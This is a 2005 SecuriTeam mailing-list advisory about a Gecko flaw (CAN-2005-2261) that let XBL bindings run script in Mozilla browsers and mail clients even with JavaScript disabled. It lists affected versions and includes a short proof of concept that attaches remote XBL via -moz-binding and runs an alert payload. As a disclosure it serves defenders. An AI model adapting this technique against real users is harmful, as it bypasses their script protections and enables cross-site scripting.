[NEWS] XBL Implementation Allows Script Execution (Gecko)

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  XBL Implementation Allows Script Execution (Gecko)
------------------------------------------------------------------------


SUMMARY

" <http://www.w3.org/TR/2001/NOTE-xbl-20010223/> XBL is a markup language 
for describing bindings that can be attached to elements in other 
documents. Bindings can be attached to elements using either cascading 
stylesheets [CSS] or the document object model [DOM]. The element that the 
binding is attached to, called the bound element, acquires the new 
behavior specified by the binding."

Lack of permission validation in Gecko based browsers and email clients 
allows XBL content to be executed, allowing attackers to cause a cross 
site scripting attack even if Javascript has been disabled.

DETAILS

Vulnerable Systems:
 * Mozilla Suite and Email client version 1.7.8 and prior
 * Mozilla Firefox version 1.0.4 and prior
 * Mozilla Thunderbird version 1.0.4
 * Netscape Browser version 8.0.2 and prior
 * K-Meleon browser version 0.9 and prior

Immune Systems:
 * Mozilla Suite and Email client version 1.7.9
 * Mozilla Firefox version 1.0.5
 * Mozilla Thunderbird version 1.0.5

Scripts in XBL controls from web content continued to execute even when 
Javascript was disabled. By itself this causes no harm, but it could be 
combined with most script-based exploits to attack people running 
vulnerable versions who thought disabling Javascript would protect them.

In the Thunderbird and Mozilla Suite mail clients Javascript is disabled 
by default for protection against denial-of-service attacks and worms; 
this vulnerability could be used to bypass that protection.

Proof of Concept:
index.html
<body>
<p>If the remote XBL is loaded, a red box appears below.</p>
<p style="-moz-binding:url(test-ex.xml#x);"></p>
</body>

test.ex.xml
<bindings>
 <binding id="x">
  <content>
     <xul:vbox style="border: 2px solid rgb(255, 0, 0);">
<xul:label value="This is the remote XBL content."/>
<xul:label value="Left-click or Right-click or Middle-click on me."/>
</xul:vbox>
</content>
     <implementation>
         <property name="localName">
           <getter>
            // it needs chrome privilege to get |Components.stack|
            var code = "alert('Exploit!\\n\\n' + Components.stack);'p';";
            var s = new String("P");
            s.toLowerCase = new Script(code);
            return s;
         </getter>
      </property>
   </implementation>
  </binding>
</bindings>

CVE Information:
 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2261> 
CAN-2005-2261


ADDITIONAL INFORMATION

The information has been provided by  <mailto:juha-matti.laurio@xxxxxxxx> 
Juha-Matti Laurio .
The original article can be found at:  
<http://www.mozilla.org/security/announce/mfsa2005-46.html> 
http://www.mozilla.org/security/announce/mfsa2005-46.html
Bug reports ca be found at:  
<https://bugzilla.mozilla.org/show_bug.cgi?id=292589> 
https://bugzilla.mozilla.org/show_bug.cgi?id=292589,
 <https://bugzilla.mozilla.org/show_bug.cgi?id=292591> 
https://bugzilla.mozilla.org/show_bug.cgi?id=292591



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@xxxxxxxxxxxxxx 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@xxxxxxxxxxxxxx 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.